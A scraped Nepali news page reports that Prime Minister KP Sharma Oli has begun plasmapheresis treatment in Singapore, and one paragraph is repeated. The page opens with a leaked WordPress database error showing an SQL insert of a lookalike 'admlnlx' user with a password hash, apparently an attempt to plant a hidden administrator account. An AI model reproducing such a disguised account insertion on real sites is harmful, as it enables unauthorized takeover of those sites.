WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbP6oslEjC7Hz8sHpHVShqZkVQSQdF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:50:42', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ८ भदौ, काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीको स्वास्थ्य उपचार शुक्रबारबाट थालिएको छ ।
प्रधानमन्त्री ओलीका निजी चिकित्सक डा. दिव्यासिंह शाहले प्लाज्मा फेरेसिस प्रक्रियामार्फत प्रधानमन्त्री ओलीको उपचार थालिएको र अहिले उहाको अवस्था सामान्य रहेको जनाएको छ । अरू केहीपटक प्लाज्मा फेरेसिस गर्नुपर्ने बताए पनि उनले कतिपटक यस्तो गर्नुपर्छ भन्नेबारे केही खुलाइनन् ।
चिकित्सकका अनुसार, प्लाज्मा फेरेसिस उपचार विधि सुरुमा ३ पटकसम्म गरिन्छ । त्यसपछि पनि एन्टिबडीको मात्रा नघटेमा त्यसलाई बढाएर ६ पटकसम्म गर्नुपर्छ । शुक्रबार पहिलोपटक यो प्रक्रिया थालिएकाले उनलाई कतिपटकसम्म गर्नुपर्ने हो निश्चित भइसकेको छैन । चिकित्सकका अनुसार, प्लाज्मा फेरेसिस उपचार विधि सुरुमा ३ पटकसम्म गरिन्छ । त्यसपछि पनि एन्टिबडीको मात्रा नघटेमा त्यसलाई बढाएर ६ पटकसम्म गर्नुपर्छ । शुक्रबार पहिलोपटक यो प्रक्रिया थालिएकाले उनलाई कतिपटकसम्म गर्नुपर्ने हो निश्चित भइसकेको छैन ।
मिर्गौलाको समस्याले पीडित प्रधानमन्त्री ओली चिकित्सकको सल्लाहअनुसार, गत बिहीबार सिंगापुर प्रस्थान गरेका थिए । उनको अहिले नेसनल युनिभर्सिटी हस्पिटलमा उपचार भइरहेको छ । विभिन्न प्रयोग र परीक्षण गर्नुपर्ने भएकाले उनको उपचारका लागि केही समय लाग्ने बताइएको छ ।
sourse:onlinekhabar